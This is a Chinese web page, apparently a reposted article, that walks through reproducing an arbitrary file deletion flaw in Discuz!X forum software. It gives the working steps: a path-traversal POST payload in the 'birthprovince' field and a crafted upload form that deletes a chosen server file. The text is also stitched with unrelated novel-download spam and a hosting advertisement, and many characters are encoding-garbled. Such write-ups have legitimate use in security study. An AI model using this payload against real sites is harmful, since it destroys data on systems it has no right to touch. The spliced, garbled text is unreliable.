欢乐颂小说结局,《完美世界》txt全集,盗墓笔记txt全集下载

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案

Discuz!X前臺任意文件刪除漏洞重現(xiàn)-創(chuàng)新互聯(lián)

漏洞背景：
Discuz!X社區(qū)軟件，是一個采用 PHP 和 MySQL 等其他多種數(shù)據(jù)庫構建的性能優(yōu)異、功能全面、安全穩(wěn)定的社區(qū)論壇平臺。

十載專注成都網(wǎng)站制作，企業(yè)網(wǎng)站設計，個人網(wǎng)站制作服務，為大家分享網(wǎng)站制作知識、方案，網(wǎng)站設計流程、步驟,成功服務上千家企業(yè)。為您提供網(wǎng)站建設,網(wǎng)站制作,網(wǎng)頁設計及定制高端網(wǎng)站建設服務,專注于企業(yè)網(wǎng)站設計,高端網(wǎng)頁制作,對混凝土攪拌機等多個行業(yè)，擁有豐富的營銷推廣經(jīng)驗。

2017年9月29日，Discuz!修復了一個安全問題用于加強安全性，這個漏洞會導致前臺用戶可以導致任意刪除文件漏洞。

2017年9月29日，知道創(chuàng)宇404 實驗室開始應急，經(jīng)過知道創(chuàng)宇404實驗室分析確認，該漏洞于2014年6月被提交到 Wooyun漏洞平臺，Seebug漏洞平臺收錄了該漏洞，漏洞編號 ssvid-93588。該漏洞通過配置屬性值，導致任意文件刪除。

經(jīng)過分析確認，原有的利用方式已經(jīng)被修復，添加了對屬性的 formtype 判斷，但修復方式不完全導致可以繞過，通過模擬文件上傳可以進入其他 unlink 條件，實現(xiàn)任意文件刪除漏洞。

漏洞復現(xiàn)：
1.進入設置-個人資料，先在頁面源代碼找到formhash值，可以看到值為2599b5e5
Discuz!X前臺任意文件刪除漏洞重現(xiàn)
2.開啟一個插件Hackbar
Post數(shù)據(jù)：birthprovince=../../../importantfile.txt&profilesubmit=1&formhash=2599b5e5

執(zhí)行后會顯示一片空白，你再刷新下或重新訪問下就好了。

3.出生地被修改成要刪除的文件。
最后構造表單執(zhí)行刪除文件
action="http://192.168.199.217/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">

生成.html，上面的需要自己修改。
4.然后隨便上傳一張圖片，就能刪除自己要刪除的。
Discuz!X前臺任意文件刪除漏洞重現(xiàn)

5.再訪問回去看一下。
Discuz!X前臺任意文件刪除漏洞重現(xiàn)

復現(xiàn)成功。

另外有需要云服務器可以了解下創(chuàng)新互聯(lián)cdcxhl.cn，海內(nèi)外云服務器15元起步，三天無理由+7*72小時售后在線，公司持有idc許可證，提供“云服務器、裸金屬服務器、高防服務器、香港服務器、美國服務器、虛擬主機、免備案服務器”等云主機租用服務以及企業(yè)上云的綜合解決方案，具有“安全穩(wěn)定、簡單易用、服務可用性高、性價比高”等特點與優(yōu)勢，專為企業(yè)上云打造定制，能夠滿足用戶豐富、多元化的應用場景需求。

網(wǎng)頁題目：Discuz!X前臺任意文件刪除漏洞重現(xiàn)-創(chuàng)新互聯(lián)
轉(zhuǎn)載注明：http://fisionsoft.com.cn/article/ejspj.html

新聞中心

其他資訊